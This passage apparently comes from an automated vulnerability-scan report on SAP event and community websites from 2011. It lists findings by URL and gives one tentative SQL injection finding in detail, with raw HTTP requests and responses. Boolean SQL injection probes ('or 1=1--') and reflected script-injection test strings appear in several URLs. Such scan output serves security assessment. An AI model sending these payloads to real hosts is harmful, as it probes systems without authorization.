12.137. http://www.sapvirtualevents.com/js/timetable.js

12.138. http://www.sapvirtualevents.com/js/utility.js

12.139. http://www.sapvirtualevents.com/js/vscrollarea.js

12.140. http://www.sapvirtualevents.com/teched

12.141. http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/webcontent/uuid/a039063f-0894-2b10-ef89-c40583db85cd

12.142. http://www.sdn.sap.com/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/104c3912-cf92-2d10-7bab-b4bb160f7154

12.143. http://www.sdn.sap.com/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/30beea32-cf92-2d10-c39d-df6728c1d180

12.144. http://www.sdn.sap.com/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/9014fd41-cf92-2d10-6e8b-f69878cc0b7f

12.145. http://www.sdn.sap.com/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/e0dc1d46-ce92-2d10-1d90-bd6b59c27dc0

12.146. http://www.sdn.sap.com/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/f03915bd-cf92-2d10-478c-cbe7715c73b4

12.147. http://www.sdn.sap.com/irj/servlet/prt/portal/prtroot/pcd!3aportal_content!2fcom.sap.sdn.folder.sdn!2fcom.sap.sdn.folder.application!2fcom.sap.sdn.folder.roles!2fcom.sap.sdn.folder.navigationroles!2fcom.sap.sdn.folder.scn!2fcom.sap.sdn.role.anonymous!2fcom.sap.sdn.tln.workset.weblogs!2fcom.sap.sdn.tln.iview.blogs

12.148. http://www.sdn.sap.com/irj/servlet/prt/portal/prtroot/pcd!3aportal_content!2fcom.sap.sdn.folder.sdn!2fcom.sap.sdn.folder.development!2fcom.sap.sdn.folders.pages!2fcom.sap.sdn.folders.layout!2fcom.sap.sdn.pages.sdnmain!2fcom.sap.sdn.SamlSCNLogon

12.149. https://www.sme.sap.com/irj/servlet/prt/portal/prtroot/pcd!3aportal_content!2fcom.sap.sdn.folder.sdn!2fcom.sap.sdn.folder.development!2fcom.sap.sdn.folders.pages!2fcom.sap.sdn.folders.layout!2fcom.sap.sdn.pages.smemain!2fcom.sap.sdn.SamlLogon

12.150. https://www.sme.sap.com/irj/sme/cpslogon

13. Password field with autocomplete enabled

13.1. https://sapphire-nowmadrid.sapevents.com/

13.2. https://teched2011madrid.sapevents.com/

13.3. https://teched2011madrid.sapevents.com/index.cfm

13.4. http://www.asugonline.com/cms/FormBuilder/Register.aspx

13.5. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

13.6. https://www.sap.com/contactsap/index.epx

13.7. https://www.sap.com/profile/login.epx

13.8. https://www.sap.com/profile/slogin.epx

13.9. https://www.sap.com/profile/slogin.epx

13.10. https://www.sap.com/sme/contactsap/index.epx

13.11. http://www.sapbusinessoptimizer.com/

13.12. http://www.sapphirenow.com/login.aspx

13.13. http://www.sapphirenow.com/login.aspx

13.14. http://www.sapphirenow.com/login.aspx

13.15. http://www.sapphirenow.com/login.aspx

13.16. http://www.sapvirtualevents.com/teched/login.aspx

13.17. http://www.sapvirtualevents.com/teched/login.aspx

13.18. http://www.sapvirtualevents.com/teched/login.aspx

13.19. http://www.sdn.sap.com/irj/scn/advancedsearch

13.20. http://www.sdn.sap.com/irj/scn/downloads

13.21. http://www.sdn.sap.com/irj/scn/index

13.22. http://www.sdn.sap.com/irj/scn/logon

13.23. http://www.sdn.sap.com/irj/scn/sdnweblogs/popularposts

13.24. http://www.sdn.sap.com/irj/scn/weblogs

13.25. http://www.sdn.sap.com/irj/scn/weblogs

13.26. http://www.sdn.sap.com/irj/scn/weblogs

13.27. http://www.sdn.sap.com/irj/scn/weblogs

13.28. http://www.sdn.sap.com/irj/sdn/logon

13.29. http://www.sdn.sap.com/irj/sdn/mypoints

13.30. https://www.sme.sap.com/irj/sme/logon

13.31. https://www.sme.sap.com/irj/sme/logon

13.32. https://www.sme.sap.com/irj/sme/logon

13.33. https://www.sme.sap.com/irj/sme/logon

13.34. https://www.sme.sap.com/irj/sme/logon

13.35. https://www.sme.sap.com/irj/sme/memberlogin

13.36. https://www.sme.sap.com/irj/sme/memberlogin

14. Source code disclosure

14.1. http://platform.linkedin.com/js/nonSecureAnonymousFramework

14.2. https://www.sme.sap.com/irj/sme/logon

14.3. https://www.sme.sap.com/irj/sme/memberlogin

15. Referer-dependent response

15.1. http://www.facebook.com/plugins/like.php

15.2. http://www.sap.com/about-sap/events/worldtour/index.epx

15.3. http://www.sap.com/gwtservices/verifylogin.epx

15.4. http://www.sap.com/index.epx

15.5. https://www.sap.com/profile/login.epx

15.6. https://www.sap.com/profile/slogin.epx

15.7. https://www.sap.com/sme/contactsap/index.epx

16. Cross-domain POST

16.1. http://info.newsgator.com/Trial_SocialSites2010.html

16.2. http://weblogs.sdn.sap.com/pub/t/27

17. Cross-domain Referer leakage

17.1. http://forums.sdn.sap.com/forum.jspa

17.2. http://forums.sdn.sap.com/thread.jspa

17.3. http://info.newsgator.com/Trial_SocialSites2010.html

17.4. http://reservoir.marketstudio.net/reservoir

17.5. http://smepartnerfinder.sap.com/FlashIFrame.aspx

17.6. http://store.businessobjects.com/DRHM/store

17.7. http://store.businessobjects.com/DRHM/store

17.8. http://store.businessobjects.com/DRHM/store

17.9. http://store.businessobjects.com/DRHM/store

17.10. http://store.businessobjects.com/DRHM/store

17.11. http://store.businessobjects.com/DRHM/store

17.12. http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800

17.13. https://teched2011madrid.sapevents.com/index.cfm

17.14. http://www.connect.facebook.com/widgets/fan.php

17.15. http://www.connect.facebook.com/widgets/fan.php

17.16. http://www.connect.facebook.com/widgets/fan.php

17.17. http://www.newsgator.com/Default.aspx

17.18. http://www.sap.com/buy-now/index.epx

17.19. http://www.sap.com/customer-showcase/innovation/index.epx

17.20. http://www.sap.com/customer-testimonials/index.epx

17.21. http://www.sap.com/gwtservices/httpBridge.epx

17.22. http://www.sap.com/lines-of-business/index.epx

17.23. http://www.sap.com/news-reader/index.epx

17.24. http://www.sap.com/news-reader/index.epx

17.25. http://www.sap.com/sme/search/index.epx

17.26. http://www.sap.com/zzzzzz=yyyyy

17.27. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

17.28. https://www.sap.com/contactsap/index.epx

17.29. https://www.sap.com/host.epx

17.30. https://www.sap.com/profile/login.epx

17.31. https://www.sap.com/profile/slogin.epx

17.32. http://www.sapphirenow.com/login.aspx

17.33. http://www.sapphirenow.com/login.aspx

17.34. http://www.sapphirenow.com/login.aspx

17.35. http://www.sapphirenow.com/login.aspx

17.36. http://www.sapphirenow.com/login.aspx

17.37. http://www.sapphirenow.com/login.aspx

17.38. http://www.sapphirenow.com/login.aspx

17.39. http://www.sapphirenow.com/login.aspx

17.40. http://www.sapphirenow.com/login.aspx

17.41. http://www.sapvirtualevents.com/teched/default.aspx

17.42. http://www.sapvirtualevents.com/teched/login.aspx

17.43. http://www.sdn.sap.com/irj/scn/advancedsearch

17.44. http://www.sdn.sap.com/irj/scn/weblogs

18. Cross-domain script include

18.1. http://ecohub.sap.com/

18.2. http://forums.sdn.sap.com/forum.jspa

18.3. http://forums.sdn.sap.com/thread.jspa

18.4. http://info.newsgator.com/Trial_SocialSites2010.html

18.5. http://store.businessobjects.com/DRHM/store

18.6. http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.%2077298800

18.7. http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800

18.8. http://store.businessobjects.com/store/bobjamer/en_US/DisplayCategoryProductListPage/categoryID.57066000/parentCategoryID.57065700

18.9. http://weblogs.sdn.sap.com/pub/q/top_weblogs

18.10. http://weblogs.sdn.sap.com/pub/t/27

18.11. http://weblogs.sdn.sap.com/pub/u/12750

18.12. http://weblogs.sdn.sap.com/pub/u/18577

18.13. http://weblogs.sdn.sap.com/pub/u/1915

18.14. http://weblogs.sdn.sap.com/pub/u/251694270

18.15. http://weblogs.sdn.sap.com/pub/u/251714417

18.16. http://weblogs.sdn.sap.com/pub/u/251739236

18.17. http://weblogs.sdn.sap.com/pub/u/251752730

18.18. http://weblogs.sdn.sap.com/pub/u/251779844

18.19. http://weblogs.sdn.sap.com/pub/u/251804053

18.20. http://weblogs.sdn.sap.com/pub/u/251822835

18.21. http://weblogs.sdn.sap.com/pub/u/251835793

18.22. http://weblogs.sdn.sap.com/pub/u/251875405

18.23. http://weblogs.sdn.sap.com/pub/u/251878923

18.24. http://weblogs.sdn.sap.com/pub/u/251902878

18.25. http://weblogs.sdn.sap.com/pub/u/251903803

18.26. http://weblogs.sdn.sap.com/pub/u/252016780

18.27. http://weblogs.sdn.sap.com/pub/u/252043411

18.28. http://weblogs.sdn.sap.com/pub/u/252043838

18.29. http://weblogs.sdn.sap.com/pub/u/252045742

18.30. http://weblogs.sdn.sap.com/pub/u/252046418

18.31. http://weblogs.sdn.sap.com/pub/u/252053025

18.32. http://weblogs.sdn.sap.com/pub/u/252086107

18.33. http://weblogs.sdn.sap.com/pub/u/252102451

18.34. http://weblogs.sdn.sap.com/pub/u/252129929

18.35. http://weblogs.sdn.sap.com/pub/u/252147393

18.36. http://weblogs.sdn.sap.com/pub/u/252158907

18.37. http://weblogs.sdn.sap.com/pub/u/252196257

18.38. http://weblogs.sdn.sap.com/pub/u/33798

18.39. http://weblogs.sdn.sap.com/pub/u/35460

18.40. http://weblogs.sdn.sap.com/pub/u/35583

18.41. http://weblogs.sdn.sap.com/pub/u/43450

18.42. http://weblogs.sdn.sap.com/pub/u/48024

18.43. http://weblogs.sdn.sap.com/pub/u/5263

18.44. http://weblogs.sdn.sap.com/pub/u/8228

18.45. http://weblogs.sdn.sap.com/pub/wlg/26917

18.46. https://weblogs.sdn.sap.com/pub/q/top_weblogs

18.47. http://www.connect.facebook.com/widgets/fan.php

18.48. http://www.newsgator.com/

18.49. http://www.newsgator.com/Default.aspx

18.50. http://www.newsgator.com/customers.aspx

18.51. http://www.newsgator.com/partners/become-a-newsgator-partner.aspx

18.52. http://www.newsgator.com/partners/channel-partners.aspx

18.53. http://www.newsgator.com/products/social-sites-for-sharepoint-2007-moss.aspx

18.54. http://www.newsgator.com/products/tomoye.aspx

18.55. http://www.sapandasug.com/

18.56. http://www.sapbusinessoptimizer.com/

18.57. http://www.sapphirenow.com/login.aspx

18.58. http://www.sapphirenow.com/login.aspx

18.59. http://www.sapphirenow.com/login.aspx

18.60. http://www.sapphirenow.com/login.aspx

18.61. http://www.sapphirenow.com/login.aspx

18.62. http://www.sapphirenow.com/login.aspx

18.63. http://www.sapphirenow.com/login.aspx

18.64. http://www.sapphirenow.com/login.aspx

18.65. http://www.sapphirenow.com/login.aspx

18.66. http://www.sapphirenow.com/login.aspx

18.67. http://www.sapphirenow.com/madrid/

18.68. http://www.sapphirenow.com/madrid/player.html

18.69. http://www.sapteched.com/china/11/cn/index/home.asp

18.70. http://www.sapteched.com/emea/about/whoshouldattend.htm

18.71. http://www.sapteched.com/emea/reghotel/home.htm

18.72. http://www.sapvirtualevents.com/teched/

18.73. http://www.sapvirtualevents.com/teched/Sessions.aspx

18.74. http://www.sapvirtualevents.com/teched/default.aspx

18.75. http://www.sapvirtualevents.com/teched/login.aspx

18.76. http://www.sapvirtualevents.com/teched/sessiondetails.aspx

18.77. http://www.sdn.sap.com/irj/scn/downloads

18.78. http://www.sdn.sap.com/irj/scn/index

19. Email addresses disclosed

19.1. http://news.google.com/

19.2. http://nmp.newsgator.com/NGBuzz/4297/load.ashx/buzz

19.3. https://sapphire-nowmadrid.sapevents.com/

19.4. http://scripts.omniture.com/javascript.js

19.5. http://smepartnerfinder.sap.com/en/

19.6. http://smepartnerfinder.sap.com/services/LeadGeneration/SalesChannelDetails.aspx

19.7. http://smepartnerfinder.sap.com/services/LeadGeneration/SalesChannels.aspx

19.8. http://store.businessobjects.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/Redesign_2011/js/functionsandplugins.js

19.9. https://teched2011madrid.sapevents.com/

19.10. https://teched2011madrid.sapevents.com/index.cfm

19.11. http://weblogs.sdn.sap.com/pub/u/251903803

19.12. http://www.asugonline.com/weborb.aspx

19.13. http://www.asugonline.com/weborb.aspx

19.14. http://www.newsgator.com/Default.aspx

19.15. http://www.newsgator.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

19.16. http://www.newsgator.com/Resources/Shared/scripts/widgets.js

19.17. http://www.newsgator.com/partners/become-a-newsgator-partner.aspx

19.18. http://www.newsgator.com/partners/channel-partners.aspx

19.19. http://www.sap.com/about-sap/company/legal/privacy.epx

19.20. http://www.sap.com/about-sap/events/worldtour/index.epx

19.21. http://www.sap.com/news-reader/index.epx

19.22. http://www.sap.com/news-reader/index.epx

19.23. http://www.sap.com/partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx

19.24. http://www.sap.com/sme/howtobuy/solution_adviser.epx

19.25. http://www.sap.com/sme/partners/findpartner/index.epx

19.26. http://www.sap.com/sme/search/index.epx

19.27. http://www.sap.com/sme/seeitinaction/customerreferences.epx

19.28. http://www.sap.com/sme/seeitinaction/index.epx

19.29. http://www.sap.com/sme/seeitinaction/overviewvideos.epx

19.30. http://www.sap.com/sme/seeitinaction/seealldemos.epx

19.31. http://www.sap.com/sme/seeitinaction/solutiondemos.epx

19.32. http://www.sap.com/sme/solutions/businessmanagement/index.epx

19.33. https://www.sap.com/sme/contactsap/index.epx

19.34. http://www.sapandasug.com/

19.35. http://www.sapandasug.com/virtual/

19.36. http://www.sapbusinessoptimizer.com/

19.37. http://www.sapphirenow.com/login.aspx

19.38. http://www.sapphirenow.com/madrid/js/jquery.colorbox.js

19.39. http://www.sapteched.com/china/11/cn/index/home.asp

19.40. http://www.sapteched.com/emea/about/whoshouldattend.htm

19.41. http://www.sapteched.com/emea/reghotel/home.htm

19.42. http://www.sapteched.com/sapphirenowsaptechedmadrid/ChooseYourExperience..htm

19.43. http://www.sapvirtualevents.com/teched/login.aspx

19.44. http://www.sdn.sap.com/irj/scn/bc

19.45. https://www.sme.sap.com/irj/portalapps/com.sap.nw.wpc.cssservice/scripts/jquery/jquery.colorbox-min.js

19.46. https://www.sme.sap.com/irj/sme/logon

19.47. https://www.sme.sap.com/irj/sme/memberlogin

20. Private IP addresses disclosed

20.1. http://static.ak.connect.facebook.com/connect.php/en_US

20.2. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

20.3. http://static.ak.connect.facebook.com/images/loaders/indicator_white_large.gif

20.4. http://static.ak.fbcdn.net/connect/xd_proxy.php

20.5. http://static.ak.fbcdn.net/connect/xd_proxy.php

20.6. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/P26mJw_1uq9.js

20.7. http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/7duzuvStMWK.css

20.8. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/zZEOQP4uOC1.gif

20.9. http://store.businessobjects.com/DRHM/store

20.10. http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.%2077298800

20.11. http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800

20.12. http://store.businessobjects.com/store/bobjamer/en_US/DisplayCategoryProductListPage/categoryID.57066000/parentCategoryID.57065700

20.13. http://wiki.sdn.sap.com/wiki/display/events/SAP+TechEd

20.14. https://wiki.sdn.sap.com/wiki/display/HOME

20.15. http://www.connect.facebook.com/widgets/fan.php

20.16. http://www.connect.facebook.com/widgets/fan.php

20.17. http://www.connect.facebook.com/widgets/fan.php

20.18. http://www.facebook.com/extern/login_status.php

20.19. http://www.facebook.com/extern/login_status.php

20.20. http://www.facebook.com/extern/login_status.php

20.21. http://www.facebook.com/plugins/like.php

20.22. http://www.facebook.com/plugins/like.php

20.23. http://www.facebook.com/plugins/like.php

20.24. http://www.facebook.com/plugins/like.php

20.25. http://www.facebook.com/plugins/like.php

20.26. http://www.facebook.com/plugins/like.php

20.27. http://www.facebook.com/plugins/like.php

20.28. http://www.facebook.com/plugins/like.php

20.29. http://www.facebook.com/plugins/like.php

20.30. http://www.facebook.com/plugins/like.php

20.31. http://www.facebook.com/plugins/like.php

20.32. http://www.facebook.com/plugins/like.php

20.33. http://www.facebook.com/plugins/like.php

20.34. http://www.facebook.com/plugins/like.php

20.35. http://www.facebook.com/plugins/like.php

20.36. http://www.facebook.com/plugins/like.php

20.37. http://www.facebook.com/plugins/like.php

20.38. http://www.facebook.com/plugins/like.php

20.39. http://www.facebook.com/plugins/like.php

20.40. http://www.facebook.com/plugins/like.php

20.41. http://www.facebook.com/plugins/like.php

20.42. http://www.facebook.com/plugins/like.php

20.43. http://www.facebook.com/plugins/like.php

20.44. http://www.facebook.com/plugins/like.php

20.45. http://www.facebook.com/plugins/like.php

20.46. http://www.facebook.com/plugins/like.php

20.47. http://www.facebook.com/plugins/like.php

20.48. http://www.sap.com/sme/seeitinaction/index.epx

21. Robots.txt file

21.1. http://ecohub.sap.com/

21.2. http://fls.doubleclick.net/activityi

21.3. http://forums.sdn.sap.com/forum.jspa

21.4. http://l.addthiscdn.com/live/t00/250lo.gif

21.5. http://leads.demandbase.com/in.php

21.6. http://omnituremarketing.d1.sc.omtrdc.net/b/ss/omniturecom,omniturecomdev,omniturecom-2011/1/H.23.4/s07447605198249

21.7. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

21.8. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard

21.9. http://pixel.mathtag.com/event/js

21.10. http://pubads.g.doubleclick.net/gampad/ads

21.11. http://s.analytics.yahoo.com/p.pl

21.12. http://safebrowsing-cache.google.com/safebrowsing/rd/ChVnb29nLWJhZGJpbi1kaWdlc3R2YXIQABiEECCEEDIFBAgAAAE

21.13. http://safebrowsing.clients.google.com/safebrowsing/downloads

21.14. http://sap.112.2o7.net/b/ss/sapcommunity,sapglobal/1/H.21/s01205263920128

21.15. http://static.2mdn.net/csi/d

21.16. http://weblogs.sdn.sap.com/api/get_wlg_info

21.17. http://www.google-analytics.com/__utm.gif

21.18. http://www.sap.com/index.epx

21.19. https://www.sap.com/sme/contactsap/index.epx

21.20. http://www.sapteched.com/sapphirenowsaptechedmadrid/

21.21. http://www.sdn.sap.com/irj/scn/forum

21.22. https://www.sdn.sap.com/irj/sdn/forum

22. Cacheable HTTPS response

22.1. https://sapphire-nowmadrid.sapevents.com/

22.2. https://teched2011madrid.sapevents.com/

22.3. https://teched2011madrid.sapevents.com/index.cfm

22.4. https://weblogs.sdn.sap.com/pub/q/top_weblogs

22.5. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

22.6. https://www.sap.com/contactsap/contact_warning.epx

22.7. https://www.sap.com/contactsap/index.epx

22.8. https://www.sap.com/host.epx

22.9. https://www.sap.com/profile/login.epx

22.10. https://www.sap.com/profile/slogin.epx

22.11. https://www.sap.com/profile/warning.epx

22.12. https://www.sap.com/sme/contactsap/FormCodesRemote.epi

22.13. https://www.sap.com/sme/contactsap/index.epx

22.14. https://www.sme.sap.com/irj/portalapps/com.sap.portal.htmlb/jslib/emptyhover.html

22.15. https://www.sme.sap.com/irj/servlet/prt/portal/prtmode/rss/prtroot/feedserver

22.16. https://www.sme.sap.com/irj/servlet/prt/portal/prtroot/pcd!3aportal_content!2fcom.sap.sdn.folder.sdn!2fcom.sap.sdn.folder.development!2fcom.sap.sdn.folders.pages!2fcom.sap.sdn.folders.layout!2fcom.sap.sdn.pages.smemain!2fcom.sap.sdn.SamlLogon

22.17. https://www.sme.sap.com/irj/sme/logon

22.18. https://www.sme.sap.com/irj/sme/memberlogin

23. HTML does not specify charset

23.1. http://fls.doubleclick.net/activityi

23.2. http://now.eloqua.com/visitor/v200/svrGP.aspx

23.3. http://weblogs.sdn.sap.com/pub/t/2716635132'%20or%201%3d2--%20

23.4. http://www.sap.com/global/ui/fonts/bensbk-webfont.woff

23.5. http://www.sapandasug.com/favicon.ico

23.6. http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css

23.7. http://www.sapbusinessoptimizer.com/favicon.ico

23.8. http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f

23.9. http://www.sapphirenow.com/madrid/

23.10. http://www.sapphirenow.com/madrid/Overview.html

23.11. http://www.sapphirenow.com/madrid/player.html

23.12. http://www.sapvirtualevents.com/JControls/Header/template/header.htm

23.13. http://www.sapvirtualevents.com/JControls/News/template/SAPNews.htm

23.14. http://www.sapvirtualevents.com/Jcontrols/Sessions/template/tabularCalMCL.htm

23.15. https://www.sme.sap.com/irj/portalapps/com.sap.portal.htmlb/jslib/emptyhover.html

24. Content type incorrectly stated

24.1. http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css

24.2. http://now.eloqua.com/visitor/v200/svrGP.aspx

24.3. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

24.4. http://sales.liveperson.net/hcp/html/mTag.js

24.5. https://sales.liveperson.net/hcp/html/mTag.js

24.6. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php

24.7. http://smepartnerfinder.sap.com/services/KeepAlive.aspx

24.8. http://smepartnerfinder.sap.com/services/LeadGeneration/Initialize.aspx

24.9. http://smepartnerfinder.sap.com/services/LeadGeneration/RegisterClick.aspx

24.10. http://smepartnerfinder.sap.com/services/LeadGeneration/SalesChannelDetails.aspx

24.11. http://smepartnerfinder.sap.com/services/LeadGeneration/SalesChannels.aspx

24.12. http://store.businessobjects.com/DRHM/store

24.13. http://survey.112.2o7.net/survey/dynamic/suites/276/omniturecom-2011/list.js

24.14. http://weblogs.sdn.sap.com/api/get_wlg_info/

24.15. http://weblogs.sdn.sap.com/pub/q/weblogs_rss

24.16. http://weblogs.sdn.sap.com/pub/t/2716635132'%20or%201%3d2--%20

24.17. http://www.asugonline.com/config/core/gc.txt

24.18. http://www.facebook.com/extern/login_status.php

24.19. http://www.sap.com/global/ui/fonts/bensbk-webfont.woff

24.20. http://www.sap.com/gwtservices/verifylogin.epx

24.21. http://www.sap.com/siteservice.epx

24.22. https://www.sap.com/profile/login.epx

24.23. https://www.sap.com/sme/contactsap/FormCodesRemote.epi

24.24. http://www.sapandasug.com/favicon.ico

24.25. http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woff

24.26. http://www.sapvirtualevents.com/JControls/Header/template/header.htm

25. Content type is not specified

25.1. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard

25.2. http://sapglobalmarketingin.tt.omtrdc.net/m2/sapglobalmarketingin/sc/standard

26. SSL certificate

26.1. https://weblogs.sdn.sap.com/

26.2. https://www.sap.com/

26.3. https://www.sdn.sap.com/


1. SQL injection  next
There are 2 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. https://teched2011madrid.sapevents.com/index.cfm [error parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://teched2011madrid.sapevents.com
Path:   /index.cfm

Issue detail

The error parameter appears to be vulnerable to SQL injection attacks. The payloads 15267202%20or%201%3d1--%20 and 15267202%20or%201%3d2--%20 were each submitted in the error parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?fuseaction=reg.Login&error=7515267202%20or%201%3d1--%20&sEmail=&sTandC=Yes&sCountry=&CFID=960984&CFTOKEN=1dbb10d8150e3e49-07F5CDB4-EF18-FB99-51600E3F9C688CBD HTTP/1.1
Host: teched2011madrid.sapevents.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://teched2011madrid.sapevents.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=960984; CFTOKEN=1dbb10d8150e3e49-07F5CDB4-EF18-FB99-51600E3F9C688CBD; SAP_TECHED2011MADRID=CFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D%5FCFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:53:41 GMT
Content-Length: 60149


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/jav
...[SNIP]...
<input type="Hidden" name="bASUG" value="0">
   
                                                       <tr>                                                        
                                                           <td colspan="1" class="warning" width="10">&nbsp;</td>
                                                           <td align="left" valign="top" class="warning" colspan="4"><br />
                                                               
    <img src="pics/Error.gif" border="0" align="absmiddle">&nbsp;&nbsp;&nbsp;Your form is incomplete. Please enter or correct the information in the fields below.
                                                                   <br /><br /> No e-mail address was supplied.No @ sign detected. An @ sign is part of every e-mail address.An @ sign cannot be the last character of the e-mail address.An @ sign cannot be the first character of the e-mail address.A valid e-mail address contains only one @ sign.No period detected. An e-mail address contains at least one period.The last character of the e-mail address cannot be a period.The first character of the e-mail address cannot be a period.A valid e-mail address cannot contain a comma. If you have a Compuserve account, substitute a period for the comma in your Compuserve ID, like so: <B>12345.6789@compuserve.com</B>.You cannot have a space as part of a single e-mail address.You cannot have an asterisk in an e-mail address.You cannot have a close parenthesis sign in an e-mail address.You cannot have an open parenthesis sign in an e-mail address.You cannot have a greater than sign in an e-mail address.You cannot have a less than sign in an e-mail address.You cannot have a colon in an e-mail address.You cannot have a semicolon in an e-mail address.You cannot have a double quote in an e-mail address.The person you are trying to invite is already in the Registration System.You must provide a last name.Please look for the checks below.We could not find a registration record with the confirmation number you entered.An e-mail to reset your password has been sent!You do not have access to this record!The record you are trying to access is still incomplete, please click on the Registration link and login to access your recor
...[SNIP]...

Request 2

GET /index.cfm?fuseaction=reg.Login&error=7515267202%20or%201%3d2--%20&sEmail=&sTandC=Yes&sCountry=&CFID=960984&CFTOKEN=1dbb10d8150e3e49-07F5CDB4-EF18-FB99-51600E3F9C688CBD HTTP/1.1
Host: teched2011madrid.sapevents.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://teched2011madrid.sapevents.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=960984; CFTOKEN=1dbb10d8150e3e49-07F5CDB4-EF18-FB99-51600E3F9C688CBD; SAP_TECHED2011MADRID=CFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D%5FCFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:53:41 GMT
Content-Length: 47815


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/jav
...[SNIP]...
<input type="Hidden" name="bASUG" value="0">
   <tr>
                                                               <td colspan="5" class="form-title-bar" align="Center" valign="Top" width="700" style="padding-top:3px;padding-bottom:3px;">
                                                           
   <table cellspacing="1" cellpadding="3" width="100%" class="DataTable">
       <tr class="DataTableTH" align="Center" valign="Top">
           <th>Begin Registration</th>
       </tr>
       <tr class="DataTableRow01">
           <td>
               <table width="100%" border="0" bordercolor="blue" cellspacing="0" cellpadding="0" align="left">
                   <tr>
                       <td>
                   

                                               
                                                   </td>
                                                   
                                                           </tr>
                                                   <tr>
                                                               <td colspan="1" class="form-body" width="10">&nbsp;</td>
                                                           
                                                                   <td colspan="4" class="form-body" align="Left" valign="Top" width="700" style="padding-top:3px;padding-bottom:3px;">
                                                               <br><strong>All fields marked with an <b class="warning">*</b> are mandatory.</strong><br><br>
                                               
                                                   </td>
                                                   
                                                           </tr>
                                                   <tr>
